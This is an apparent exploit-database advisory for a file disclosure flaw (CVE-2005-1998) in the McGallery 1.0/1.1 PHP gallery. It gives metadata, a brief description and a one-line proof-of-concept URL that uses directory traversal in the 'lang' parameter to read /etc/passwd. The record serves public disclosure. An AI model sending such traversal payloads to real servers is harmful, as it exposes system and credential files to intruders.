McGallery 1.0/1.1 - Lang Argument File Disclosure

Author: D_BuG
type: webapps
platform: php
port: 
date_added: 2005-06-15 
date_updated: 2013-05-30 
verified: 1 
codes: CVE-2005-1998;OSVDB-17343 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/13963/info

McGallery is prone to a file disclosure vulnerability.

This could let remote attackers access files on the computer in the context of the Web server process.

http://example.com/mcgallery/admin.php?lang=../../../../../../etc/passwd